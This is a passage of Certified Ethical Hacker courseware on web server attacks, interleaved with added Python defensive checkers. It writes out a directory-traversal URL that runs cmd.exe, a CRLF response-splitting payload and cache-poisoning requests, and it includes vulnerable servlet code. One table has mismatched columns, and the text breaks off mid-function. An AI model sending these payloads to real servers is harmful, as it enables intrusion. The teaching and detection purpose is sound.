Ethical Hacking and Countermeasures v8
Module 12: Hacking Webservers
Exam 312-50 Certified Ethical Hacker

Engineered by Hackers. Presented by Professionals.

Module 12 Page 1601
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Security News

GoDaddy Outage Takes Down Millions of Sites, Anonymous Member Claims Responsibility
Monday, September 10th, 2012
Source: http://techcrunch.com
Final update: GoDaddy is up, and claims that the outage was due to internal errors and not a DDoS attack.

According to many customers, sites hosted by major web host and domain registrar GoDaddy are down. According to the official GoDaddy Twitter account, the company is aware of the issue and is working to resolve it.

Update: Customers are complaining that GoDaddy hosted e-mail accounts are down as well, along with GoDaddy phone service and all sites using GoDaddy's DNS service.

Update 2: A member of Anonymous known as AnonymousOwn3r is claiming responsibility, and makes it clear this is not an Anonymous collective action.

A tipster tells us that the technical reason for the failure is being caused by the inaccessibility of GoDaddy's DNS servers - specifically CNS1.SECURESERVER.NET, CNS2.SECURESERVER.NET, and CNS3.SECURESERVER.NET are failing to resolve.


AnonymousOwn3r's bio reads "Security leader of #Anonymous ("Official member")." The individual claims to be from Brazil, and hasn't issued a statement as to why GoDaddy was targeted.

Last year GoDaddy was pressured into opposing SOPA as customers transferred domains off the service, and the company has been the center of a few other controversies. However, AnonymousOwn3r has tweeted "I'm not anti go daddy, you guys will understand because i did this attack."

Copyright © 2012 AOL Inc.
By Klint Finley
http://techcrunch.com/2012/09/10/godaddy-outage-takes-down-millions-of-sites/


Module Objectives

Often, a breach in security causes more damage in terms of goodwill than in actual quantifiable loss. This makes web server security critical to the normal functioning of an organization. Most organizations consider their web presence to be an extension of themselves. This module highlights the various security concerns in the context of web servers. After finishing this module, you will be able to understand what a web server is and how it is structured, how attackers compromise it, the different types of attacks an attacker can carry out against web servers, the tools used in web server hacking, and so on. Web server security is a vast domain, and a full treatment of its finer details is beyond the scope of this module. This module familiarizes you with:

- IIS Web Server Architecture
- Why Web Servers Are Compromised?
- Impact of Webserver Attacks
- Webserver Attacks
- Webserver Attack Methodology
- Webserver Attack Tools
- Metasploit Architecture
- Web Password Cracking Tools
- How to Defend Against Web Server Attacks
- Countermeasures
- Patch Management
- Patch Management Tools
- Webserver Security Tools
- Webserver Pen Testing Tools
- Webserver Pen Testing


Module Flow

To understand hacking web servers, you should first know what a web server is, how it functions, and what other elements are associated with it. All of these are simply termed web server concepts, so we discuss web server concepts first.

The module proceeds through the following topics: Webserver Concepts, Webserver Attacks, Attack Methodology, Webserver Attack Tools, Webserver Security Tools, Webserver Pen Testing, Patch Management, and Counter-measures.

This section gives a brief overview of the web server and its architecture. It also explains the common mistakes that let attackers compromise a web server and succeed, and describes the impact of attacks on the web server.


Webserver Market Shares

Source: http://w3techs.com

The following statistics show the percentages of websites using various web servers. From the statistics it is clear that Apache is the most commonly used web server, with 64.6%. Below that, Microsoft IIS is used by 17.4% of websites, followed by Nginx with 13%.

FIGURE 12.1: Web Server Market Shares (bar chart, 0-80%): Apache 64.6%, Microsoft IIS 17.4%, Nginx 13%, then LiteSpeed, Google Server, Tomcat, and Lighttpd with small shares (the slide shows 1.7% and 1.2% for LiteSpeed and Google Server).


Open Source Web Server Architecture

The diagram below illustrates the basic components of an open source web server architecture: site users and the site admin reach the server over the Internet (the same path an attacker's requests take), and the server stack consists of the Linux operating system and file system, the Apache web server, PHP applications and compiled extensions, a MySQL database, and email.

FIGURE 12.2: Open Source Web Server Architecture

Where,

- Linux - the server's operating system
- Apache - the web server component
- MySQL - a relational database
- PHP - the application layer


IIS Web Server Architecture

IIS, also known as Internet Information Services, is a web server application developed by Microsoft for Microsoft Windows. It is the second most widely used web server after the Apache HTTP server, with around 17.4% of the total market share. It supports HTTP, HTTPS, FTP, FTPS, SMTP, and NNTP. Microsoft describes IIS for Windows Server as a flexible, secure, and easy-to-manage web server for hosting anything on the web.

The diagram that follows illustrates the basic components of the IIS web server architecture:

FIGURE 12.3: IIS Web Server Architecture. A client (e.g., Internet Explorer) reaches the server over the Internet through the kernel-mode HTTP protocol stack (HTTP.SYS). In user mode, Svchost.exe hosts the WWW Service and the Windows Process Activation Service (WAS), which read applicationHost.config. Requests are dispatched to an application pool (worker process) containing the Web Server Core, native modules, and an AppDomain with managed modules (for example Forms Authentication); external applications sit alongside. The Web Server Core pipeline performs: begin request processing, authentication, authorization, cache resolution, handler mapping, handler pre-execution, release state, update cache, update log, and end request processing. The native modules include anonymous authentication, the managed engine, IIS certificate mapping, static file, default document, HTTP cache, HTTP errors, and HTTP logging.


Website Defacement

Website defacement is the process by which hackers change the content of a website or web page. They break into the web server and alter the hosted website, replacing its pages with something of their own.

Web defacement occurs when an intruder maliciously alters the visual appearance of a web page by inserting or substituting provocative and frequently offensive data. Defaced pages expose visitors to propaganda or misleading information until the unauthorized change is discovered and corrected.

FIGURE 12.4: Website Defacement. The slide shows a browser at http://juggyboy.com/index.aspx displaying a defaced page: "You are OWNED!!!!!!! HACKED! Hi Master, Your website owned by US, Hacker! Next target - microsoft.com".
Why Web Servers Are Compromised

There are inherent security risks associated with web servers, the local area networks that host websites, and the users who access those websites with browsers.

- Webmaster's concern: From a webmaster's perspective, the biggest security concern is that the web server can expose the local area network (LAN) or the corporate intranet to the threats the Internet poses, whether viruses, Trojans, attackers, or the compromise of information itself. Software bugs in large, complex programs are a common source of security lapses, and web servers are large, complex programs that carry the same risk. In addition, the open architecture of web servers allows arbitrary scripts to run on the server side while replying to remote requests, and any CGI script installed at the site may contain bugs that are potential security holes.

- Network administrator's concern: From a network administrator's perspective, a poorly configured web server is another potential hole in the local network's security. While the objective of a web server is to provide controlled access to the network, too much control can make the site almost impossible to use. In an intranet environment, the administrator has to configure the web server carefully so that legitimate users are recognized and authenticated, and different groups of users are assigned distinct access privileges.

- End user's concern: Usually, the end user does not perceive any immediate threat, as surfing the web appears both safe and anonymous. However, active content such as ActiveX controls and Java applets makes it possible for harmful applications, such as viruses, to invade the user's system. Active content delivered through the browser can also be a conduit for malicious software to bypass the firewall and spread through the local area network.

The table that follows shows the causes and consequences of web server compromises:

TABLE 12.1: Causes and consequences of web server compromises

Cause | Consequence
Installing the server with default settings | Unnecessary default, backup, or sample files
Improper file and directory permissions | Security conflicts with business ease-of-use case
Default accounts with their default passwords | Misconfigurations in web server, operating systems, and networks
Unpatched security flaws in the server software, OS, and applications | Lack of proper security policy, procedures, and maintenance
Misconfigured SSL certificates and encryption settings | Bugs in server software, OS, and web applications
Use of self-signed certificates and default certificates | Improper authentication with external systems
Unnecessary services enabled, including content management and remote administration | Administrative or debugging functions that are enabled or accessible


Impact of Web Server Attacks

Attackers can cause various kinds of damage to an organization by attacking a web server. The damage includes:

- Compromise of user accounts: Web server attacks are often aimed at compromising user accounts. An attacker who compromises an account can gain a lot of useful information and can use the account to launch further attacks on the web server.

- Data tampering: The attacker can alter or delete data, or even replace it with malware so that whoever connects to the web server is compromised in turn.

- Website defacement: Hackers completely change the look of the website by replacing the original content with visuals and pages carrying messages of their own.

- Secondary attacks from the website: Once an attacker compromises a web server, he or she can use it to launch further attacks on other websites or on client systems.

- Data theft: Data is one of the main assets of a company. Attackers can gain access to sensitive company data such as the source code of a particular program.

- Root access to other applications or servers: Root access is the highest privilege with which one can log in to a system, be it a dedicated server, a semi-dedicated server, or a virtual private server. Attackers can perform any action once they have root access to the resource.

Module Flow

Now that you are familiar with web server concepts, we move on to the possible attacks on web servers. Almost every online action is performed with the help of a web server, so web servers are a critical resource of an organization, and for the same reason they are a favorite target of attackers. Attackers use many techniques to compromise a web server, among them HTTP response splitting attacks, web cache poisoning attacks, HTTP response hijacking, and web application attacks. This section discusses these attack techniques.

Module flow: Webserver Concepts, Webserver Attacks, Attack Methodology, Webserver Attack Tools, Webserver Security Tools, Webserver Pen Testing, Patch Management, Counter-measures.
Web Server Misconfiguration

Web servers have various vulnerabilities related to configuration, applications, files, scripts, or web pages. Once an attacker finds one of them, for example a remotely accessible administration interface, it becomes a doorway into the company's network, and such loopholes can let the attacker bypass user authentication. Server misconfiguration refers to configuration weaknesses in web infrastructure that can be exploited to launch attacks on web servers such as directory traversal, server intrusion, and data theft. Once detected, these problems are easy to exploit and can result in the total compromise of a website. Typical misconfigurations include:

- Remote administration functions left reachable, which give an attacker a way to take over the server.
- Unnecessary services enabled, each of which adds attack surface.
- Misconfigured or default SSL certificates.
- Verbose debug/error messages.
- Anonymous or default users/passwords.
- Sample configuration and script files.
Web Server Misconfiguration Example

Consider the httpd.conf file on an Apache server:

<Location /server-status>
SetHandler server-status
</Location>

FIGURE 12.5: httpd.conf file on an Apache server

This configuration allows anyone to view the server status page, which contains detailed information about the current use of the web server, including the hosts and requests currently being processed. The handler is only safe when the Location block also restricts who may reach it.

Consider another example, the php.ini file:

display_errors = On
log_errors = On
error_log = syslog
ignore_repeated_errors = Off

FIGURE 12.6: php.ini file on an Apache server

With display_errors enabled, PHP sends its verbose error messages (file paths, failing queries, and similar detail) to the visitor's browser rather than only to the error log.
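To turn the two examples above into a check you can run against real configuration files, here is an added example (editor's code, not part of the courseware) that scans an httpd.conf for server-status or server-info handlers with no access restriction and a php.ini for display_errors. The vulnerable and hardened configuration texts are constructed sample input; the `Require` directive used in the hardened sample is Apache 2.4 access-control syntax.

```python
"""Audit an Apache httpd.conf and a php.ini for the two misconfigurations
discussed above: an unrestricted /server-status handler and verbose PHP
error display. Example code added by the editor; the configuration text
below is constructed for illustration and does not come from a real server."""
import re

# Constructed sample: the page's misconfiguration, as shown in Figure 12.5.
VULNERABLE_HTTPD_CONF = """\
ServerName www.example.test
<Location /server-status>
    SetHandler server-status
</Location>
"""

# Constructed sample: same handler, reachable only from localhost and the LAN.
HARDENED_HTTPD_CONF = """\
ServerName www.example.test
<Location /server-status>
    SetHandler server-status
    Require ip 127.0.0.1 10.0.0.0/8
</Location>
"""

VULNERABLE_PHP_INI = "display_errors = On\nlog_errors = On\nerror_log = syslog\n"
HARDENED_PHP_INI = "display_errors = Off\nlog_errors = On\nerror_log = syslog\n"

# Directives that restrict who may reach a <Location>. "Require all granted"
# is deliberately excluded: it opens the location to everyone.
_ACCESS_RE = re.compile(
    r"^\s*(Require\s+(?!all\s+granted)\S|Deny\s+from|Allow\s+from|Order\s)",
    re.IGNORECASE | re.MULTILINE,
)
_LOCATION_RE = re.compile(r"<Location\s+([^>]+)>(.*?)</Location>",
                          re.IGNORECASE | re.DOTALL)
_STATUS_HANDLER_RE = re.compile(
    r"^\s*SetHandler\s+(server-status|server-info)\b", re.IGNORECASE | re.MULTILINE)
_KV_RE = re.compile(r"^\s*([A-Za-z_.]+)\s*=\s*(.*?)\s*(?:;.*)?$", re.MULTILINE)


def audit_httpd_conf(conf: str) -> list:
    """Return one finding per status/info handler that anyone on the Internet can reach."""
    findings = []
    for match in _LOCATION_RE.finditer(conf):
        path, body = match.group(1).strip(), match.group(2)
        handler = _STATUS_HANDLER_RE.search(body)
        if handler and not _ACCESS_RE.search(body):
            findings.append(
                f"{path}: SetHandler {handler.group(1)} with no access restriction "
                f"(add e.g. 'Require ip 127.0.0.1' or 'Require local')")
    return findings


def audit_php_ini(ini: str) -> list:
    """Return findings for error-reporting settings that leak detail to visitors."""
    settings = {k.lower(): v.strip().strip('"').lower() for k, v in _KV_RE.findall(ini)}
    findings = []
    if settings.get("display_errors") in ("on", "1", "true", "stdout", "stderr"):
        findings.append("display_errors is enabled: PHP errors (paths, queries) are shown "
                        "to visitors; set display_errors = Off and keep log_errors = On")
    if settings.get("log_errors") in ("off", "0", "false"):
        findings.append("log_errors is disabled: errors are neither shown nor logged")
    return findings


if __name__ == "__main__":
    for name, conf in (("vulnerable", VULNERABLE_HTTPD_CONF), ("hardened", HARDENED_HTTPD_CONF)):
        print(name, "httpd.conf:", audit_httpd_conf(conf) or "ok")
    for name, ini in (("vulnerable", VULNERABLE_PHP_INI), ("hardened", HARDENED_PHP_INI)):
        print(name, "php.ini:", audit_php_ini(ini) or "ok")
```

The checker only looks inside `<Location>` blocks; a `Require` placed in a `<Directory>` or `.htaccess` would not be seen, so treat a clean result as a first pass rather than proof that the status page is locked down.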
Directory Traversal Attacks

Web servers are designed so that public access is limited to a defined set of directories. Directory traversal is an exploitation of HTTP through which attackers are able to access restricted directories and execute commands outside of the web server's root directory by manipulating a URL. Attackers can use trial and error to navigate outside the root directory and access sensitive information on the system. In the example shown in the figure, the request

http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:

uses a URL-encoded backslash (%5c) inside a ".." sequence to escape the /scripts directory, reach cmd.exe in the Windows system directory, and run "dir c:" on the server.

FIGURE 12.7: Directory Traversal Attacks. The browser requests the URL above and receives the output of "dir c:" executed on the server: a listing of the C: drive (Volume Serial Number D45E-9FEE) including .rnd, 123.text, AUTOEXEC.BAT, CONFIG.SYS, WinDump.exe and the directories CATALINA_HOME, Documents and Settings, Downloads, Intel, Program Files, Snort, and WINDOWS (7 files, 13 directories). The web root's own folders (company, downloads, imgs, news, scripts, support) are shown alongside.
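Added example, not from the courseware: a Python detector for traversal attempts of the kind shown above. It canonicalises a request path (strips the query string, percent-decodes repeatedly so double encoding does not hide the sequence, and treats the IIS backslash as a separator), flags any surviving ".." segment, shows the safe way to map a request onto a document root, and runs the check over access-log lines. DOCROOT, the sample paths and the log lines are constructed for the demonstration.

```python
"""Detect and neutralise directory traversal attempts like the URL above.
Example code added by the editor, not from the courseware. DOCROOT, the
sample request paths and the access-log lines are constructed for the demo."""
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/html"   # assumed document root for the example

# Constructed sample paths: two traversal attempts (the page's URL-encoded
# backslash, and a double-encoded slash) and two benign requests.
SAMPLE_PATHS = [
    "/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:",   # the page's example
    "/images/..%252f..%252f..%252fetc/passwd",               # %252f -> %2f -> /
    "/index.html",
    "/docs/release-notes..v2.txt",                           # '..' inside a name
]

# Constructed access-log lines in common log format.
SAMPLE_LOG = [
    '10.0.0.5 - - [28/Sep/2010:06:43:01 +0000] "GET /scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c: HTTP/1.0" 200 512',
    '10.0.0.7 - - [28/Sep/2010:06:43:02 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def canonicalize(request_path: str, rounds: int = 3) -> str:
    """Strip the query string, percent-decode until the string stops changing
    (up to `rounds` times, which defeats double encoding), and treat
    backslashes as separators the way IIS does."""
    path = request_path.split("?", 1)[0]
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def is_traversal(request_path: str) -> bool:
    """True if any path segment is exactly '..' after canonicalisation."""
    return any(seg == ".." for seg in canonicalize(request_path).split("/"))


def resolve_safely(request_path: str, docroot: str = DOCROOT):
    """Map a request onto the filesystem and refuse anything that escapes
    docroot. Returns the absolute path, or None if the request breaks out.
    normpath collapses '..' so the prefix check below is meaningful."""
    rel = canonicalize(request_path).lstrip("/")
    full = posixpath.normpath(posixpath.join(docroot, rel))
    if full != docroot and not full.startswith(docroot.rstrip("/") + "/"):
        return None
    return full


def scan_log(lines) -> list:
    """Return the request paths in access-log lines that look like traversal,
    the sort of check an IDS rule or a WAF regression test would make."""
    hits = []
    for line in lines:
        try:
            path = line.split('"', 2)[1].split(" ")[1]   # '"GET /path HTTP/1.x"'
        except IndexError:
            continue
        if is_traversal(path):
            hits.append(path)
    return hits


if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        print(f"{p!r}: traversal={is_traversal(p)} -> {resolve_safely(p)}")
    print("log hits:", scan_log(SAMPLE_LOG))
```

The prefix check in resolve_safely is the part that actually protects a file server; the pattern match in is_traversal is a detection aid and will not catch every encoding a given server accepts (IIS, for instance, once decoded %c0%af as a slash), so the filesystem-level check should never be replaced by the string check alone.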

HTTP Response Splitting Attack

An HTTP response splitting attack is a web-based attack in which the server is tricked into emitting attacker-chosen header lines: the attacker injects new-line characters, followed by arbitrary headers and content, into a value that the application copies into a response header. Like Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), and SQL Injection, it is an attack that abuses unvalidated input. The attacker crafts a single request so that the web server's reply is parsed by the recipient as two responses. This is accomplished by adding header response data to the input field: the attacker passes malicious data (a CRLF sequence followed by a second set of headers) to a vulnerable application, and the application includes that data in an HTTP response header, which splits the response. The attacker controls the first response, for example to redirect the user to a malicious website, whereas the other response is discarded by the web browser, or, as the following attacks show, handed to whoever reads the connection next.

Input = Jason
HTTP/1.1 200 OK
Set-Cookie: author=Jason

Input = JasonTheHacker\r\nHTTP/1.1 200 OK\r\n

Vulnerable servlet code:

String author = request.getParameter(AUTHOR_PARAM);
Cookie cookie = new Cookie("author", author);
cookie.setMaxAge(cookieExpiration);
response.addCookie(cookie);

First Response (Controlled by Attacker)
HTTP/1.1 200 OK
Set-Cookie: author=JasonTheHacker

Second Response
HTTP/1.1 200 OK

FIGURE 12.8: HTTP Response Splitting Attack

Web Cache Poisoning Attack

Web cache poisoning is an attack on the trustworthiness of an intermediate web cache: legitimate content cached for a given URL is swapped for attacker-supplied content. Users of the web cache then unknowingly receive the poisoned content instead of the genuine page when they request that URL through the cache.

The attacker first forces the cache to discard its copy of the target page and then sends a specially crafted response-splitting request whose second, attacker-controlled response is stored in the cache under the target URL. The following diagram explains the whole process step by step:

1. The attacker sends a request to remove the page from the cache:
   GET http://juggyboy.com/index.html HTTP/1.1
   Pragma: no-cache
   Host: juggyboy.com
   Accept-Charset: iso-8859-1,*,utf-8
2. The cache entry for juggyboy.com is cleared and the normal page is returned.
3. The attacker sends a malicious request that generates two responses (4 and 6) through the vulnerable redirect script (http://www.juggyboy.com/welcome.php?lang=, whose source is <?php header("Location:" . $_GET['page']); ?>):
   GET http://juggyboy.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>Attack Page</html> HTTP/1.1
   Host: juggyboy.com
4. The attacker receives the first server response.
5. The attacker requests juggyboy.com again to generate a cache entry:
   GET http://juggyboy.com/index.html HTTP/1.1
   Host: testsite.com
   User-Agent: Mozilla/4.7 [en] (WinNT; I)
   Accept-Charset: iso-8859-1,*,utf-8
6. The attacker receives the second response of request 3, which points to the attacker's page, and the cache now stores it as the page for www.juggyboy.com.

FIGURE 12.9: Web Cache Poisoning Attack. Before the attack the server cache maps www.juggyboy.com to the original Juggyboy page; afterwards the poisoned server cache maps www.juggyboy.com to the attacker's page.



HTTP Response Hijacking
HTTP response hijacking is accomplished with a response splitting request. In this attack, the attacker first sends a response splitting request to the web server. The server splits the response in two and sends the first response to the attacker and the second response to the victim. On receiving the response from the web server, the victim requests the service by supplying credentials. At the same time, the attacker requests the index page. The web server then sends the response to the victim's request to the attacker, and the victim remains uninformed.
The diagram that follows shows the step-by-step procedure of an HTTP response hijacking attack:


FIGURE 12.10: HTTP Response Hijacking
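As an added example (not courseware code), a Python check a defender can put in front of a redirect handler such as the `header ("Location:" . $_GET['page'])` script in Figure 12.9: it refuses redirect targets that carry CR/LF and flags logged query strings with the response splitting shape that both the cache poisoning and response hijacking attacks rely on. The allowlisted host names and the sample values are constructed assumptions.

```python
# Added example (not the courseware's code): defending a redirect parameter
# against HTTP response splitting, the primitive behind web cache poisoning
# and HTTP response hijacking.  Host names below are constructed assumptions.
from typing import Optional
from urllib.parse import unquote, urlsplit

# Hosts this application is allowed to redirect to (constructed allowlist).
ALLOWED_REDIRECT_HOSTS = {"juggyboy.com", "www.juggyboy.com"}

# Tokens a forged second response would have to carry after the line break.
FORGED_RESPONSE_MARKERS = ("http/1.", "content-length:", "content-type:",
                           "set-cookie:", "location:")


def decode_twice(raw_value: str) -> str:
    """Percent-decode twice: some stacks decode once before the application
    sees the value, so %250d%250a would otherwise slip past a single decode."""
    return unquote(unquote(raw_value))


def contains_header_injection(raw_value: str) -> bool:
    """True if the decoded value carries CR, LF or NUL, i.e. anything that can
    terminate the Location header line and start a new header or response."""
    decoded = decode_twice(raw_value)
    return any(ch in decoded for ch in ("\r", "\n", "\x00"))


def safe_redirect_target(raw_value: str) -> Optional[str]:
    """Validated replacement for echoing $_GET['page'] into Location.
    Returns the target to redirect to, or None when it must be refused."""
    if contains_header_injection(raw_value):
        return None
    target = decode_twice(raw_value)
    parts = urlsplit(target)
    # Site-relative path: no scheme, no authority, not protocol-relative (//host).
    if parts.scheme == "" and parts.netloc == "" and target.startswith("/"):
        return target
    # Absolute URL: only to hosts we own, only over http(s).
    if parts.scheme in ("http", "https") and parts.netloc.lower() in ALLOWED_REDIRECT_HOSTS:
        return target
    return None


def looks_like_response_splitting(query_string: str) -> bool:
    """Log-review helper: flags a query string that, once decoded, contains a
    line break followed by a status line or header (the shape of request [3]
    in Figure 12.9).  Plain CR/LF without those markers is reported as False
    so that ordinary multi-line form data does not trip the check."""
    decoded = decode_twice(query_string).lower()
    if "\r" not in decoded and "\n" not in decoded:
        return False
    return any(marker in decoded for marker in FORGED_RESPONSE_MARKERS)


if __name__ == "__main__":
    # Constructed inputs modelled on the requests in Figure 12.9.
    for value in ("/welcome.php?lang=en",
                  "http://www.juggyboy.com/index.html",
                  "//evil.example/",
                  "%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK"):
        print(repr(value), "->", safe_redirect_target(value))
```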


SSH Brute Force Attack

- SSH protocols are used to create an encrypted SSH tunnel between two hosts in order to transfer unencrypted data over an insecure network.
- Attackers can brute force SSH login credentials to gain unauthorized access to an SSH tunnel.
- SSH tunnels can be used to transmit malware and other exploits to victims without being detected.

[Slide diagram: Attacker, Internet, User, SSH Server, Mail Server, Web Server, Application Server, File Server.]

SSH Brute Force Attack
SSH protocols are used to create an encrypted SSH tunnel between two hosts in order to transfer unencrypted data over an insecure network. To conduct an attack on SSH, the attacker first scans the SSH server to identify possible vulnerabilities. With the help of a brute force attack, the attacker obtains the login credentials. Once the attacker has the SSH login credentials, he or she uses the same SSH tunnels to transmit malware and other exploits to victims without being detected.


FIGURE 12.11: SSH Brute Force Attack
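As an added example, not part of the courseware, a Python script that reads constructed OpenSSH auth log lines, counts failed logins per source address to surface brute force attempts, and audits a constructed sshd_config fragment for the settings (PermitRootLogin, PasswordAuthentication, MaxAuthTries) that make such attacks cheap.

```python
# Added example (not part of the courseware): spotting an SSH brute force
# attempt in OpenSSH auth log lines and auditing the sshd_config settings that
# limit it.  The log lines and the config fragment are constructed samples.
import re
from collections import defaultdict

SAMPLE_AUTH_LOG = """\
Oct 11 09:34:01 web01 sshd[2211]: Failed password for root from 203.0.113.5 port 51022 ssh2
Oct 11 09:34:02 web01 sshd[2211]: Failed password for root from 203.0.113.5 port 51022 ssh2
Oct 11 09:34:02 web01 sshd[2213]: Failed password for invalid user admin from 203.0.113.5 port 51030 ssh2
Oct 11 09:34:03 web01 sshd[2214]: Failed password for invalid user test from 203.0.113.5 port 51031 ssh2
Oct 11 09:34:05 web01 sshd[2216]: Failed password for invalid user guest from 203.0.113.5 port 51033 ssh2
Oct 11 09:34:07 web01 sshd[2218]: Accepted publickey for deploy from 198.51.100.7 port 40110 ssh2
Oct 11 09:35:10 web01 sshd[2220]: Failed password for alice from 198.51.100.9 port 40200 ssh2
Oct 11 09:35:40 web01 sshd[2221]: Accepted password for alice from 198.51.100.9 port 40201 ssh2
"""

# Constructed sshd_config fragment with the settings a brute forcer relies on.
SAMPLE_SSHD_CONFIG = """\
# constructed sshd_config fragment
Port 22
PermitRootLogin yes
PasswordAuthentication yes
MaxAuthTries 6
"""

# "Failed password for [invalid user ]<user> from <ip> port <n> ssh2"
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+")


def failed_logins_by_source(log_text):
    """Map each source IP to the list of usernames that failed from it."""
    failures = defaultdict(list)
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            failures[m.group("ip")].append(m.group("user"))
    return dict(failures)


def brute_force_candidates(log_text, threshold=4):
    """Return (ip, failure_count, distinct_users) for sources at or above the
    threshold, highest count first.  Many distinct users from one source is
    the signature of dictionary-style guessing rather than a user's typo."""
    result = []
    for ip, users in failed_logins_by_source(log_text).items():
        if len(users) >= threshold:
            result.append((ip, len(users), len(set(users))))
    return sorted(result, key=lambda r: r[1], reverse=True)


# OpenSSH directives whose values blunt brute forcing ("no" disables).
RECOMMENDED = {"permitrootlogin": "no", "passwordauthentication": "no"}
MAX_AUTH_TRIES = 3


def audit_sshd_config(config_text):
    """Return (directive, current, recommended) for each weak or missing setting."""
    settings = {}
    for line in config_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        settings[key.lower()] = value.strip().lower()
    findings = []
    for key, wanted in RECOMMENDED.items():
        current = settings.get(key, "<default>")
        if current != wanted:
            findings.append((key, current, wanted))
    tries = int(settings.get("maxauthtries", "6"))   # OpenSSH default is 6
    if tries > MAX_AUTH_TRIES:
        findings.append(("maxauthtries", str(tries), str(MAX_AUTH_TRIES)))
    return findings


if __name__ == "__main__":
    print(brute_force_candidates(SAMPLE_AUTH_LOG))
    for finding in audit_sshd_config(SAMPLE_SSHD_CONFIG):
        print("weak setting: %s=%s (recommended %s)" % finding)
```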


Man-in-the-Middle Attack

- Man-in-the-Middle (MITM) attacks allow an attacker to access sensitive information by intercepting and altering communications between an end user and web servers.
- The attacker acts as a proxy such that all communication between the user and the web server passes through him.

[Slide diagram: Normal Traffic to the Webserver, with the Attacker in the middle.]

Man-in-the-Middle Attack
A man-in-the-middle attack is a method in which an intruder intercepts or modifies the messages exchanged between the user and the web server by eavesdropping on or intruding into a connection. This allows an attacker to steal sensitive user information such as online banking details, user names, passwords, etc. transferred over the Internet to the web server. The attacker lures the victim into connecting to the web server through the attacker by pretending to be a proxy. If the victim believes and accepts the attacker's request, then all communication between the user and the web server passes through the attacker. Thus, the attacker can steal sensitive user information.


[Figure diagram: Normal Traffic: User visits a website. Attacker sniffs the communication to steal session IDs.]
FIGURE 12.12: Man-in-the-Middle Attack


Webserver Password Cracking

- An attacker tries to exploit weaknesses to hack well-chosen passwords.
- Many hacking attempts start with cracking passwords and prove to the Webserver that they are a valid user.
- The most common passwords found are password, root, administrator, admin, demo, test, guest, qwerty, pet names, etc.
- Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan Horse or virus, wiretapping, keystroke logging, etc.

- Web form authentication cracking
- SSH Tunnels
- FTP servers
- SMTP servers
- Web shares

Web Server Password Cracking
Most hacking starts with password cracking. Once the password is cracked, the hacker can log in to the network as an authorized person. The most common passwords found are password, root, administrator, admin, demo, test, guest, QWERTY, pet names, etc. Attackers use different methods such as social engineering, spoofing, phishing, using a Trojan horse or virus, wiretapping, keystroke logging, brute force attacks, dictionary attacks, etc. to crack passwords.
Attackers mainly target:
- Web form authentication cracking
- SSH tunnels
- FTP servers
- SMTP servers
- Web shares


Webserver Password Cracking Techniques

Passwords may be cracked manually or with automated tools such as Cain and Abel, Brutus, THC Hydra, etc.

Passwords can be cracked by using the following techniques:

Hybrid Attack (technique 4): A hybrid attack works similar to a dictionary attack, but it adds numbers or symbols to the password attempt.

Web Server Password Cracking Techniques

Passwords may be cracked manually or with automated tools such as Cain & Abel, Brutus, THC Hydra, etc. Attackers follow various techniques to crack passwords:

- Guessing: A common cracking method used by attackers is to guess passwords, either by humans or by automated tools provided with dictionaries. Most people tend to use their pets' names, loved ones' names, license plate numbers, dates of birth, or other weak passwords such as "QWERTY," "password," "admin," etc. so that they can remember them easily. The same habit allows the attacker to crack passwords by guessing.

- Dictionary Attack: A dictionary attack tries predefined words in various combinations. It may not be effective if the password consists of special characters and symbols, but compared to a brute force attack it is less time consuming.

- Brute Force Attack: In the brute force method, all possible characters are tested, for example, uppercase from "A to Z," numbers from "0 to 9," or lowercase "a to z." This method is useful for identifying one-word or two-word passwords. Whereas if a password consists of uppercase and lowercase letters and special characters, it might take months or years to crack the password, which is practically impossible.


- Hybrid Attack: A hybrid attack is more powerful, as it uses both a dictionary attack and a brute force attack: it also includes symbols and numbers. Password cracking becomes easier with this method.
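As an added example (not from the text), a Python estimate of which technique above, dictionary, hybrid or brute force, would recover a given password, with a constructed mini wordlist and an assumed guess rate of 10^9 per second; it goes a little beyond the text by computing the brute force keyspace from the character classes actually present in the password.

```python
# Added example, not from the courseware: estimating which of the techniques
# above (dictionary, hybrid, brute force) would recover a given password, so a
# defender can judge a password policy.  The wordlist and guess rate are
# constructed illustrative values, not figures from the text.
import string

# Constructed mini wordlist standing in for a cracker's dictionary; the first
# entries are the common passwords named in the text.
WORDLIST = {"password", "root", "administrator", "admin", "demo", "test",
            "guest", "qwerty", "fluffy", "welcome", "summer"}

GUESSES_PER_SECOND = 1e9   # assumed offline cracking rate, for illustration
ONE_DAY = 86_400


def charset_size(password):
    """Size of the alphabet a brute force attack must enumerate: the sum of the
    character classes present (lower 26, upper 26, digit 10, symbol 32)."""
    size = 0
    if any(c.islower() for c in password):
        size += 26
    if any(c.isupper() for c in password):
        size += 26
    if any(c.isdigit() for c in password):
        size += 10
    if any(c in string.punctuation for c in password):
        size += len(string.punctuation)   # 32 printable ASCII symbols
    return size


def brute_force_seconds(password, rate=GUESSES_PER_SECOND):
    """Worst-case time to exhaust charset^length at the given rate."""
    return charset_size(password) ** len(password) / rate


def hybrid_base_word(password):
    """Hybrid attacks append or prepend digits and symbols to dictionary words.
    Return the dictionary word this password is built on, or None."""
    core = password.lower().strip(string.digits + string.punctuation)
    return core if core in WORDLIST else None


def classify(password):
    """Name the cheapest technique from the text that recovers the password."""
    if password.lower() in WORDLIST:
        return "dictionary"
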